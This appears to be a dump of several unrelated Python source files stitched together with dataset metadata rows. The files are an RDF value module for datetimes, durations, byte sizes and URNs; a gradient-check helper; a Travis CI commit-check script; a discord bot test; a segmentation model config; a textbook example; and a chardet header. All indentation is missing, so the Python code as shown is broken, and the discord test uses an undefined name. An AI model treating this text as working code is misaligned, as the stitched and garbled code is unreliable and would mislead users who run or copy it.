def ParseFromDatastore(self, value):
utils.AssertType(value, int)
self._value = value
def ParseFromHumanReadable(self, string):
utils.AssertType(string, unicode)
self._value = int(string)
def __str__(self):
return str(self._value)
def __unicode__(self):
return unicode(self._value)
@classmethod
def FromDatastoreValue(cls, value, age=None):
return cls(initializer=value, age=age)
def SerializeToDataStore(self):
"""Use varint to store the integer."""
return self._value
def __long__(self):
return int(self._value)
def __int__(self):
return int(self._value)
def __float__(self):
return float(self._value)
def __index__(self):
return self._value
def __lt__(self, other):
return self._value < other
def __and__(self, other):
return self._value & other
def __rand__(self, other):
return self._value & other
def __iand__(self, other):
self._value &= other
return self
def __or__(self, other):
return self._value | other
def __ror__(self, other):
return self._value | other
def __ior__(self, other):
self._value |= other
return self
def __add__(self, other):
return self._value + other
def __radd__(self, other):
return self._value + other
def __iadd__(self, other):
self._value += other
return self
def __sub__(self, other):
return self._value - other
def __rsub__(self, other):
return other - self._value
def __isub__(self, other):
self._value -= other
return self
def __mul__(self, other):
return self._value * other
# TODO(hanuszczak): There are no `__rop__` methods in Python 3 so all of these
# should be removed. Also, in general it should not be possible to add two
# values with incompatible types (e.g. `RDFInteger` and `int`). Sadly,
# currently a lot of code depends on this behaviour but it should be changed
# in the future.
def __rmul__(self, other):
return self._value * other
def __div__(self, other):
return self._value.__div__(other)
def __truediv__(self, other):
return self._value.__truediv__(other)
def __floordiv__(self, other):
return self._value.__floordiv__(other)
def __hash__(self):
return hash(self._value)
class RDFBool(RDFInteger):
"""Boolean value."""
data_store_type = "unsigned_integer"
def ParseFromHumanReadable(self, string):
utils.AssertType(string, unicode)
upper_string = string.upper()
if upper_string == u"TRUE" or string == u"1":
self._value = 1
elif upper_string == u"FALSE" or string == u"0":
self._value = 0
else:
raise ValueError("Unparsable boolean string: `%s`" % string)
class RDFDatetime(RDFInteger):
"""A date and time internally stored in MICROSECONDS."""
converter = MICROSECONDS
data_store_type = "unsigned_integer"
def __init__(self, initializer=None, age=None):
super(RDFDatetime, self).__init__(None, age)
self._value = 0
if initializer is None:
return
if isinstance(initializer, (RDFInteger, int, long, float)):
self._value = int(initializer)
else:
raise InitializeError(
"Unknown initializer for RDFDateTime: %s." % type(initializer))
@classmethod
def Now(cls):
return cls(int(time.time() * cls.converter))
def Format(self, fmt):
"""Return the value as a string formatted as per strftime semantics."""
return time.strftime(
fmt.encode("ascii"), time.gmtime(self._value / self.converter))
def __str__(self):
"""Return the date in human readable (UTC)."""
return self.Format("%Y-%m-%d %H:%M:%S")
def __unicode__(self):
return utils.SmartUnicode(str(self))
def AsDatetime(self):
"""Return the time as a python datetime object."""
return datetime.datetime.utcfromtimestamp(self._value / self.converter)
def AsSecondsSinceEpoch(self):
return self._value // self.converter
def AsMicrosecondsSinceEpoch(self):
return self._value
@classmethod
def FromSecondsSinceEpoch(cls, value):
# Convert to int in case we get fractional seconds with higher
# resolution than what this class supports.
return cls(int(value * cls.converter))
@classmethod
def FromDatetime(cls, value):
res = cls()
seconds = calendar.timegm(value.utctimetuple())
res.SetRaw((seconds * cls.converter) + value.microsecond)
return res
@classmethod
def FromHumanReadable(cls, value, eoy=False):
res = cls()
res.ParseFromHumanReadable(value, eoy=eoy)
return res
@classmethod
def Lerp(cls, t, start_time, end_time):
"""Interpolates linearly between two datetime values.
Args:
t: An interpolation "progress" value.
start_time: A value for t = 0.
end_time: A value for t = 1.
Returns:
An interpolated `RDFDatetime` instance.
Raises:
TypeError: If given time values are not instances of `RDFDatetime`.
ValueError: If `t` parameter is not between 0 and 1.
"""
if not (isinstance(start_time, RDFDatetime) and
isinstance(end_time, RDFDatetime)):
raise TypeError("Interpolation of non-datetime values")
if not 0.0 <= t <= 1.0:
raise ValueError("Interpolation progress does not belong to [0.0, 1.0]")
return RDFDatetime(round((1 - t) * start_time._value + t * end_time._value)) # pylint: disable=protected-access
def ParseFromHumanReadable(self, string, eoy=False):
# TODO(hanuszczak): This method should accept only unicode literals.
self._value = self._ParseFromHumanReadable(string, eoy=eoy)
def __add__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
return self.__class__(self._value + other * self.converter)
return NotImplemented
def __iadd__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
self._value += other * self.converter
return self
return NotImplemented
def __mul__(self, other):
if isinstance(other, (int, long, float, Duration)):
return self.__class__(self._value * other)
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __sub__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
return self.__class__(self._value - other * self.converter)
if isinstance(other, RDFDatetime):
return Duration(self.AsSecondsSinceEpoch() - other.AsSecondsSinceEpoch())
return NotImplemented
def __isub__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
self._value -= other * self.converter
return self
return NotImplemented
@classmethod
def _ParseFromHumanReadable(cls, string, eoy=False):
"""Parse a human readable string of a timestamp (in local time).
Args:
string: The string to parse.
eoy: If True, sets the default value to the end of the year. Usually this
method returns a timestamp where each field that is not present in the
given string is filled with values from the date January 1st of the
current year, midnight. Sometimes it makes more sense to compare against
the end of a period so if eoy is set, the default values are copied from
the 31st of December of the current
year, 23:59h.
Returns:
The parsed timestamp.
"""
# TODO(hanuszczak): Date can come either as a single integer (which we
# interpret as a timestamp) or as a really human readable thing such as
# '2000-01-01 13:37'. This is less than ideal (since timestamps are not
# really "human readable) and should be fixed in the future.
try:
return int(string)
except ValueError:
pass
# By default assume the time is given in UTC.
# pylint: disable=g-tzinfo-datetime
if eoy:
default = datetime.datetime(
time.gmtime().tm_year, 12, 31, 23, 59, tzinfo=dateutil.tz.tzutc())
else:
default = datetime.datetime(
time.gmtime().tm_year, 1, 1, 0, 0, tzinfo=dateutil.tz.tzutc())
# pylint: enable=g-tzinfo-datetime
timestamp = parser.parse(string, default=default)
return calendar.timegm(timestamp.utctimetuple()) * cls.converter
def Floor(self, interval):
if not isinstance(interval, Duration):
raise TypeError("Expected `Duration`, got `%s`" % interval.__class__)
seconds = self.AsSecondsSinceEpoch() // interval.seconds * interval.seconds
return self.FromSecondsSinceEpoch(seconds)
class RDFDatetimeSeconds(RDFDatetime):
"""A DateTime class which is stored in whole seconds."""
converter = 1
class Duration(RDFInteger):
"""Duration value stored in seconds internally."""
data_store_type = "unsigned_integer"
# pyformat: disable
DIVIDERS = collections.OrderedDict((
("w", 60 * 60 * 24 * 7),
("d", 60 * 60 * 24),
("h", 60 * 60),
("m", 60),
("s", 1)))
# pyformat: enable
def __init__(self, initializer=None, age=None):
super(Duration, self).__init__(None, age)
if isinstance(initializer, Duration):
self._value = initializer._value # pylint: disable=protected-access
elif isinstance(initializer, basestring):
self.ParseFromHumanReadable(initializer)
elif isinstance(initializer, (int, long, float)):
self._value = initializer
elif isinstance(initializer, RDFInteger):
self._value = int(initializer)
elif initializer is None:
self._value = 0
else:
raise InitializeError(
"Unknown initializer for Duration: %s." % type(initializer))
@classmethod
def FromSeconds(cls, seconds):
return cls(seconds)
def Validate(self, value, **_):
self.ParseFromString(value)
def ParseFromString(self, string):
self.ParseFromHumanReadable(string)
def SerializeToString(self):
return str(self)
@property
def seconds(self):
return self._value
@property
def microseconds(self):
return self._value * 1000000
def __str__(self):
time_secs = self._value
for label, divider in iteritems(self.DIVIDERS):
if time_secs % divider == 0:
return "%d%s" % (time_secs // divider, label)
def __unicode__(self):
return utils.SmartUnicode(str(self))
def __add__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
return self.__class__(self._value + other)
return NotImplemented
def __iadd__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
self._value += other
return self
return NotImplemented
def __mul__(self, other):
if isinstance(other, (int, long, float, Duration)):
return self.__class__(int(self._value * other))
return NotImplemented
def __rmul__(self, other):
return self.__mul__(other)
def __sub__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
return self.__class__(self._value - other)
return NotImplemented
def __isub__(self, other):
if isinstance(other, (int, long, float, Duration)):
# Assume other is in seconds
self._value -= other
return self
return NotImplemented
def __abs__(self):
return Duration(abs(self._value))
def Expiry(self, base_time=None):
if base_time is None:
base_time = RDFDatetime.Now()
else:
base_time = base_time.Copy()
base_time_sec = base_time.AsSecondsSinceEpoch()
return RDFDatetime.FromSecondsSinceEpoch(base_time_sec + self._value)
def ParseFromHumanReadable(self, timestring):
"""Parse a human readable string of a duration.
Args:
timestring: The string to parse.
"""
if not timestring:
return
orig_string = timestring
multiplicator = 1
if timestring[-1].isdigit():
pass
else:
try:
multiplicator = self.DIVIDERS[timestring[-1]]
except KeyError:
raise RuntimeError("Invalid duration multiplicator: '%s' ('%s')." %
(timestring[-1], orig_string))
timestring = timestring[:-1]
try:
self._value = int(timestring) * multiplicator
except ValueError:
raise InitializeError(
"Could not parse expiration time '%s'." % orig_string)
class ByteSize(RDFInteger):
"""A size for bytes allowing standard unit prefixes.
We use the standard IEC 60027-2 A.2 and ISO/IEC 80000:
Binary units (powers of 2): Ki, Mi, Gi
SI units (powers of 10): k, m, g
"""
data_store_type = "unsigned_integer"
DIVIDERS = dict((
("", 1),
("k", 1000),
("m", 1000**2),
("g", 1000**3),
("ki", 1024),
("mi", 1024**2),
("gi", 1024**3),
))
REGEX = re.compile("^([0-9.]+)([kmgi]*)b?$", re.I)
def __init__(self, initializer=None, age=None):
super(ByteSize, self).__init__(None, age)
if isinstance(initializer, ByteSize):
self._value = initializer._value # pylint: disable=protected-access
elif isinstance(initializer, basestring):
self.ParseFromHumanReadable(initializer)
elif isinstance(initializer, (int, long, float)):
self._value = initializer
elif isinstance(initializer, RDFInteger):
self._value = int(initializer)
elif initializer is None:
self._value = 0
else:
raise InitializeError(
"Unknown initializer for ByteSize: %s." % type(initializer))
def __str__(self):
size_token = ""
if self._value > 1024**3:
size_token = "GiB"
value = self._value / 1024**3
elif self._value > 1024**2:
size_token = "MiB"
value = self._value / 1024**2
elif self._value > 1024:
size_token = "KiB"
value = self._value / 1024
else:
return utils.SmartStr(self._value) + "B"
return "%.1f%s" % (value, size_token)
def ParseFromHumanReadable(self, string):
"""Parse a human readable string of a byte string.
Args:
string: The string to parse.
Raises:
DecodeError: If the string can not be parsed.
"""
if not string:
return None
match = self.REGEX.match(string.strip().lower())
if not match:
raise DecodeError("Unknown specification for ByteSize %s" % string)
multiplier = self.DIVIDERS.get(match.group(2))
if not multiplier:
raise DecodeError("Invalid multiplier %s" % match.group(2))
# The value may be represented as a float, but if not dont lose accuracy.
value = match.group(1)
if "." in value:
value = float(value)
else:
value = int(value)
self._value = int(value * multiplier)
@functools.total_ordering
class RDFURN(RDFPrimitive):
"""An object to abstract URL manipulation."""
data_store_type = "string"
# Careful when changing this value, this is hardcoded a few times in this
# class for performance reasons.
scheme = "aff4"
_string_urn = ""
def __init__(self, initializer=None, age=None):
"""Constructor.
Args:
initializer: A string or another RDFURN.
age: The age of this entry.
"""
# This is a shortcut that is a bit faster than the standard way of
# using the RDFValue constructor to make a copy of the class. For
# RDFURNs that way is a bit slow since it would try to normalize
# the path again which is not needed - it comes from another
# RDFURN so it is already in the correct format.
if isinstance(initializer, RDFURN):
# Make a direct copy of the other object
self._string_urn = initializer.Path()
super(RDFURN, self).__init__(None, age=age)
return
super(RDFURN, self).__init__(initializer=initializer, age=age)
if self._value is None and initializer is not None:
if isinstance(initializer, bytes):
self.ParseFromString(initializer)
elif isinstance(initializer, unicode):
self.ParseFromUnicode(initializer)
else:
message = "Unsupported initializer `%s` of type `%s"
message %= (initializer, type(initializer))
raise TypeError(message)
def ParseFromString(self, initializer):
"""Create RDFRUN from string.
Args:
initializer: url string
"""
utils.AssertType(initializer, bytes)
self.ParseFromUnicode(initializer.decode("utf-8"))
def ParseFromUnicode(self, initializer):
utils.AssertType(initializer, unicode)
# Strip off the aff4: prefix if necessary.
if initializer.startswith("aff4:/"):
initializer = initializer[5:]
self._string_urn = utils.NormalizePath(initializer)
def ParseFromDatastore(self, value):
utils.AssertType(value, unicode)
# TODO(hanuszczak): We should just assign the `self._string_urn` here
# instead of including all of the parsing magic since the data store values
# should be normalized already. But sadly this is not the case and for now
# we have to deal with unnormalized values as well.
self.ParseFromUnicode(value)
def ParseFromHumanReadable(self, string):
self.ParseFromUnicode(string)
def SerializeToString(self):
return str(self)
def SerializeToDataStore(self):
return unicode(self)
def Dirname(self):
return posixpath.dirname(self._string_urn)
def Basename(self):
return posixpath.basename(self.Path())
def Add(self, path, age=None):
"""Add a relative stem to the current value and return a new RDFURN.
If urn is a fully qualified URN, replace the current value with it.
Args:
path: A string containing a relative path.
age: The age of the object. If None set to current time.
Returns:
A new RDFURN that can be chained.
Raises:
ValueError: if the path component is not a string.
"""
if not isinstance(path, basestring):
raise ValueError("Only strings should be added to a URN.")
result = self.Copy(age)
result.Update(path=utils.JoinPath(self._string_urn, path))
return result
def Update(self, url=None, path=None):
"""Update one of the fields.
Args:
url: An optional string containing a URL.
path: If the path for this URN should be updated.
"""
if url:
self.ParseFromString(url)
if path:
self._string_urn = path
self.dirty = True
def Copy(self, age=None):
"""Make a copy of ourselves."""
if age is None:
age = int(time.time() * MICROSECONDS)
return self.__class__(self, age=age)
def __str__(self):
return utils.SmartStr("aff4:%s" % self._string_urn)
def __unicode__(self):
return utils.SmartUnicode(u"aff4:%s" % self._string_urn)
def __eq__(self, other):
if isinstance(other, basestring):
other = self.__class__(other)
elif other is None:
return False
elif not isinstance(other, RDFURN):
return NotImplemented
return self._string_urn == other.Path()
def __bool__(self):
return bool(self._string_urn)
def __nonzero__(self):
return bool(self._string_urn)
def __lt__(self, other):
return self._string_urn < other
def Path(self):
"""Return the path of the urn."""
return self._string_urn
def Split(self, count=None):
"""Returns all the path components.
Args:
count: If count is specified, the output will be exactly this many path
components, possibly extended with the empty string. This is useful for
tuple assignments without worrying about ValueErrors: namespace, path =
urn.Split(2)
Returns:
A list of path components of this URN.
"""
if count:
result = list(filter(None, self._string_urn.split("/", count)))
while len(result) < count:
result.append("")
return result
else:
return list(filter(None, self._string_urn.split("/")))
def RelativeName(self, volume):
"""Given a volume URN return the relative URN as a unicode string.
We remove the volume prefix from our own.
Args:
volume: An RDFURN or fully qualified url string.
Returns:
A string of the url relative from the volume or None if our URN does not
start with the volume prefix.
"""
string_url = utils.SmartUnicode(self)
volume_url = utils.SmartUnicode(volume)
if string_url.startswith(volume_url):
result = string_url[len(volume_url):]
# This must always return a relative path so we strip leading "/"s. The
# result is always a unicode string.
return result.lstrip("/")
return None
def __repr__(self):
return "<%s age=%s>" % (self, self.age)
class Subject(RDFURN):
"""A psuedo attribute representing the subject of an AFF4 object."""
DEFAULT_FLOW_QUEUE = RDFURN("F")
class SessionID(RDFURN):
"""An rdfvalue object that represents a session_id."""
def __init__(self,
initializer=None,
age=None,
base="aff4:/flows",
queue=DEFAULT_FLOW_QUEUE,
flow_name=None):
"""Constructor.
Args:
initializer: A string or another RDFURN.
age: The age of this entry.
base: The base namespace this session id lives in.
queue: The queue to use.
flow_name: The name of this flow or its random id.
Raises:
InitializeError: The given URN cannot be converted to a SessionID.
"""
if initializer is None:
# This SessionID is being constructed from scratch.
if flow_name is None:
flow_name = utils.PRNG.GetUInt32()
if isinstance(flow_name, int):
initializer = RDFURN(base).Add("%s:%X" % (queue.Basename(), flow_name))
else:
initializer = RDFURN(base).Add("%s:%s" % (queue.Basename(), flow_name))
else:
if isinstance(initializer, RDFURN):
try:
self.ValidateID(initializer.Basename())
except ValueError as e:
raise InitializeError(
"Invalid URN for SessionID: %s, %s" % (initializer, e.message))
super(SessionID, self).__init__(initializer=initializer, age=age)
def Queue(self):
return RDFURN(self.Basename().split(":")[0])
def FlowName(self):
return self.Basename().split(":", 1)[1]
def Add(self, path, age=None):
# Adding to a SessionID results in a normal RDFURN.
return RDFURN(self).Add(path, age=age)
@classmethod
def ValidateID(cls, id_str):
# This check is weaker than it could be because we allow queues called
# "DEBUG-user1" and IDs like "TransferStore". We also have to allow
# flows session ids like H:123456:hunt.
allowed_re = re.compile(r"^[-0-9a-zA-Z]+(:[0-9a-zA-Z]+){0,2}$")
if not allowed_re.match(id_str):
raise ValueError("Invalid SessionID: %s" % id_str)
# TODO(hanuszczak): Remove this class.
class FlowSessionID(SessionID):
pass
| 28.069656 | 116 | 0.679911 |
ace8ba1ca38a94afe633e4bfecfe24510d532461 | 4,859 | py | Python | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | src/UnitTest/Python/tf_ops/check_gradients.py | grayish/Open3D | de386ab3521d489cd1483c8a2d966694930350a9 | [
"MIT"
] | null | null | null | import numpy as np
from collections import OrderedDict
def compute_jacobian_finite_differences(x0, fn, epsilon):
"""Computes the Jacobian using finite differences
x0: The positions at which to compute J.
fn: A function of the form fn(x) which returns a single numpy array.
epsilon: A scalar or an array that can be broadcasted to the same
shape as x0.
"""
dtype = x0.dtype
y0 = fn(x0)
h = np.zeros_like(x0)
J = np.zeros((x0.size, y0.size), dtype=dtype)
epsilon_arr = np.broadcast_to(epsilon, x0.shape)
for i in range(x0.size):
eps = epsilon_arr.flat[i]
h.flat[i] = eps
J[i, :] = ((fn(x0 + h) - y0) / eps).flat
h.flat[i] = 0
return J
def compute_jacobian_analytical(x0, y_shape, fn_grad, y_bp=None):
"""Computes the analytical Jacobian
x0: The position at which to compute J.
y_shape: The shape of the backpropagated value, i.e. the shape of
the output of the corresponding function 'fn'.
fn_grad: The gradient of the original function with the form
x_grad = fn_grad(y_bp, x0) where 'y_bp' is the backpropagated
value and 'x0' is the original input to 'fn'. The output of
the function is the gradient of x wrt to y.
y_bp: Optional array with custom values for individually scaling
the gradients.
"""
dtype = x0.dtype
y_size = 1
for k in y_shape:
y_size *= k
J = np.zeros((x0.size, y_size), dtype=dtype)
y = np.zeros(y_shape, dtype=dtype)
y_bp_arr = np.broadcast_to(y_bp, y_shape) if not y_bp is None else np.ones(
y_shape, dtype=dtype)
for j in range(y_size):
y.flat[j] = y_bp_arr.flat[j]
J[:, j] = fn_grad(y, x0).flat
y.flat[j] = 0
return J
def check_gradients(x0,
fn,
fn_grad,
epsilon=1e-6,
rtol=1e-3,
atol=1e-5,
debug_outputs=OrderedDict()):
"""Checks if the numerical and analytical gradients are compatible for a function 'fn'
x0: The position at which to compute the gradients.
fn: A function of the form fn(x) which returns a single numpy array.
fn_grad: The gradient of the original function with the form
x_grad = fn_grad(y_bp, x0) where 'y_bp' is the backpropagated
value and 'x0' is the original input to 'fn'. The output of
the function is the gradient of x wrt to y.
epsilon: A scalar or an array that can be broadcasted to the same
shape as x0. This is used for computing the numerical Jacobian
rtol: The relative tolerance parameter used in numpy.allclose()
atol: The absolute tolerance parameter used in numpy.allclose()
debug_outputs: Output variable which stores additional outputs useful for
debugging in a dictionary.
"""
dtype = x0.dtype
y = fn(x0) # compute y to get the shape
grad = fn_grad(np.zeros(y.shape, dtype=dtype), x0)
grad_shape_correct = x0.shape == grad.shape
if not grad_shape_correct:
print(
'The shape of the gradient [{0}] does not match the shape of "x0" [{1}].'
.format(grad.shape, x0.shape))
zero_grad = np.count_nonzero(grad) == 0
if not zero_grad:
print('The gradient is not zero for a zero backprop vector.')
ana_J = compute_jacobian_analytical(x0, y.shape, fn_grad)
ana_J2 = compute_jacobian_analytical(x0, y.shape, fn_grad,
2 * np.ones(y.shape, dtype=x0.dtype))
num_J = compute_jacobian_finite_differences(x0, fn, epsilon)
does_scale = np.allclose(0.5 * ana_J2, ana_J, rtol, atol)
isclose = np.allclose(ana_J, num_J, rtol, atol)
ana_J_iszero = np.all(ana_J == 0)
if ana_J_iszero and not np.allclose(num_J, np.zeros_like(num_J), rtol,
atol):
print(
'The values of the analytical Jacobian are all zero but the values of the numerical Jacobian are not.'
)
elif not does_scale:
print(
'The gradients do not scale with respect to the backpropagated values.'
)
if not isclose:
print('The gradients are not close to the numerical Jacobian.')
debug_outputs.update(
OrderedDict([
('isclose', isclose),
('does_scale', does_scale),
('ana_J_iszero', ana_J_iszero),
('grad_shape_correct', grad_shape_correct),
('zero_grad', zero_grad),
('ana_J', ana_J),
('num_J', num_J),
('absdiff', np.abs(ana_J - num_J)),
]))
result = isclose and does_scale
return result
| 32.393333 | 114 | 0.599918 |
ace8ba2fbdb71ee146225b70ea940e7c3faefe92 | 4,478 | py | Python | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | 1 | 2019-12-14T21:55:24.000Z | 2019-12-14T21:55:24.000Z | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | null | null | null | cicd/ci.py | jiankaiwang/bites | 2b27ac4199a978bb0ee11958f582a76c2ad99bbc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 25 16:27:55 2018
@author: acer4755g
"""
import REQUESTMETHOD2
import json
import sys
import os
import getopt
import logging
import subprocess
# help message
def helpMessgae():
print("""Usage: python ci.py [options]
[options]
-u the username, e.g. jiankaiwang (necessary)
-n the repository name, e.g. umap (necessary)
-t the travis token (necessary)
-p the cd path (necessary)
-h, --help the help message
""")
# parse opts
def parseOpts(get_opts):
return(dict((k,v) for k,v in get_opts))
def get_Travis_Repo_API(user, repo_name):
travis_repo_api = REQUESTMETHOD2.SENDREQUEST(\
"http://api.travis-ci.org/repos/{}/{}".format(user, repo_name), {}, {}, "GET")
travis_repo_api_res = travis_repo_api.response()
travis_repo_api_res_json = json.loads(travis_repo_api_res["response"])
if "id" in travis_repo_api_res_json.keys():
return travis_repo_api_res_json
else:
return {"id":"-1"}
def get_Travis_Repo_Build_API(repo_id, token):
travis_ci_api = REQUESTMETHOD2.SENDREQUEST(\
"https://api.travis-ci.org/repo/{}/builds?limit=1".format(repo_id), \
{"Authorization" : "token {}".format(token)\
,"Travis-API-Version" : "3" \
,"User-Agent" : "API Explorer"}, \
{}, "GET")
travis_ci_api_res = travis_ci_api.response()
travis_ci_api_res_json = json.loads(travis_ci_api_res["response"])
if "builds" in travis_ci_api_res_json.keys():
return travis_ci_api_res_json
else:
return {"sha":"-1"}
def get_local_commit(getwd):
os.chdir(getwd)
bashCommand = "git rev-parse HEAD"
logging.debug(bashCommand)
try:
if sys.platform[0:3] == "win":
process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
elif sys.platform[0:3] == "lin":
process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
output, error = process.communicate()
logging.warning('Output:{},Error:{}'.format(output.decode('utf-8'), error.decode('utf-8')))
return output.decode('utf-8')
except:
logging.warning("Can not get local master commit.")
return "-1"
# main entry
logging.basicConfig(level=logging.WARNING)
opts, args = getopt.getopt(sys.argv[1:], "fhu:n:p:t:", ["help"])
opts = parseOpts(opts)
if len(opts) < 1:
logging.debug("opts < 1")
helpMessgae()
elif '--help' in opts.keys() or '-h' in opts.keys():
logging.debug("opts exists help")
helpMessgae()
else:
if "-p" not in opts.keys() or len(opts["-p"]) < 1 or (not os.path.exists(opts["-p"])):
logging.warning("No assigned respoitory.")
sys.exit(1)
if "-u" not in opts.keys() or len(opts["-u"]) < 1:
logging.warning("No assigned username.")
sys.exit(1)
if "-n" not in opts.keys() or len(opts["-n"]) < 1:
logging.warning("No assigned repository.")
sys.exit(1)
if "-t" not in opts.keys() or len(opts["-t"]) < 1:
logging.warning("No assigned travis token.")
sys.exit(1)
travis_repo_api_res_json = get_Travis_Repo_API(opts["-u"], opts["-n"])
travis_repo_id = travis_repo_api_res_json["id"]
if travis_repo_id == -1:
logging.warning("No such repository in Travis.")
sys.exit(1)
travis_ci_api_res_json = get_Travis_Repo_Build_API(travis_repo_id, opts["-t"])
travis_ci_api_sha, travis_ci_api_build = \
travis_ci_api_res_json["builds"][0]["commit"]["sha"]\
, travis_ci_api_res_json["builds"][0]["state"]
if travis_ci_api_sha == -1:
logging.warning("Token key is not allowed.")
sys.exit(1)
if travis_ci_api_build != "passed":
logging.warning("CI build failed. Not to CD.")
sys.exit(1)
local_sha = get_local_commit(opts["-p"])
if local_sha == -1:
logging.warning("Can not get commit sha from local git repository.")
sys.exit(1)
else:
if local_sha.strip() == travis_ci_api_sha.strip():
logging.warning("Already the latest commit. No need to CD.")
sys.exit(1)
elif len(local_sha.strip()) < 1:
logging.warning("No git found or no commit. Can's start CD.")
sys.exit(1)
sys.exit(0)
| 31.985714 | 134 | 0.622376 |
ace8bb5ae01db7892402930627483c481a396350 | 436 | py | Python | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 122 | 2016-08-05T02:27:31.000Z | 2022-03-21T07:53:10.000Z | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 15 | 2017-12-07T14:28:20.000Z | 2021-11-19T13:03:37.000Z | tests/test_send.py | Der-Eddy/discord_bot | bc2511e6d030ee2e099410bd846ea871fe3f109d | [
"MIT"
] | 100 | 2016-08-21T18:12:29.000Z | 2022-02-19T11:21:23.000Z | import discord
import pytest
bot_channel = 165174405222236161
@pytest.mark.asyncio
async def test_message(bot):
channel = client.get_channel(bot_channel)
await channel.send("Test Message")
@pytest.mark.asyncio
async def test_embed(bot):
channel = client.get_channel(bot_channel)
embed = discord.Embed(title="Test Embed")
embed.add_field(name="Field 1", value="Lorem ipsum")
await channel.send(embed=embed)
| 21.8 | 56 | 0.745413 |
ace8bcad5cdbd9f1f50c1398795bc86f9911aa9f | 1,280 | py | Python | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | 2 | 2020-07-10T12:13:56.000Z | 2020-11-09T07:09:29.000Z | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | null | null | null | configs/_base_/models/isanet_r50-d8.py | openseg-group/mmsegmentation | 23939f09d2b0bd30fc26eb7f8af974f1f5441210 | [
"Apache-2.0"
] | 2 | 2020-07-28T09:12:55.000Z | 2021-01-04T07:49:59.000Z | # model settings
norm_cfg = dict(type='SyncBN', requires_grad=True)
model = dict(
type='EncoderDecoder',
pretrained='open-mmlab://resnet50_v1c',
backbone=dict(
type='ResNetV1c',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
dilations=(1, 1, 2, 4),
strides=(1, 2, 1, 1),
norm_cfg=norm_cfg,
norm_eval=False,
style='pytorch',
contract_dilation=True),
decode_head=dict(
type='ISAHead',
in_channels=2048,
in_index=3,
channels=512,
isa_channels=256,
down_factor=(8, 8),
dropout_ratio=0.1,
num_classes=19,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
auxiliary_head=dict(
type='FCNHead',
in_channels=1024,
in_index=2,
channels=256,
num_convs=1,
concat_input=False,
dropout_ratio=0.1,
num_classes=19,
norm_cfg=norm_cfg,
align_corners=False,
loss_decode=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)))
# model training and testing settings
train_cfg = dict()
test_cfg = dict(mode='whole') | 28.444444 | 74 | 0.5875 |
ace8bdb3f1d4b87d2a9552de9c3ac8988202f400 | 640 | py | Python | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 35 | 2019-05-03T00:30:31.000Z | 2022-01-20T06:57:25.000Z | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 1 | 2020-09-04T02:04:33.000Z | 2020-09-04T02:04:33.000Z | Chapter 05/keyword_args.py | nescience8/starting-out-with-python-global-4th-edition | c16f93b7cbb4c7ae7b57653a7190bf192fe6b472 | [
"MIT"
] | 22 | 2020-05-13T21:20:02.000Z | 2021-12-21T08:35:59.000Z | # This program demonstrates keyword arguments.
def main():
# Show the amount of simple interest using 0.01 as
# interest rate per period, 10 as the number of periods,
# and $10,000 as the principal.
show_interest(rate=0.01, periods=10, principal=10000.0)
# The show_interest function displays the amount of
# simple interest for a given principal, interest rate
# per period, and number of periods.
def show_interest(principal, rate, periods):
interest = principal * rate * periods
print('The simple interest will be $', \
format(interest, ',.2f'), \
sep='')
# Call the main function.
main()
| 30.47619 | 60 | 0.690625 |
ace8bf4075ac6431c0db62aaafe879fd9615d1da | 30,537 | py | Python | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/_vendor/chardet/big5freq.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Modified Work: Copyright (c) 2018, 2022, Oracle and/or its affiliates. All rights reserved.
